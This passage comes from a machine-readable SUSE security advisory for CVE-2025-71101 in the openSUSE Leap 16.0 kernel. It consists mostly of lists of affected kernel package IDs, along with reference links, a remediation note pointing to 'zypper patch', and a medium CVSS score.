"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71101",
"url": "https://www.suse.com/security/cve/CVE-2025-71101"
},
{
"category": "external",
"summary": "SUSE Bug 1256594 for CVE-2025-71101",
"url": "https://bugzilla.suse.com/1256594"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
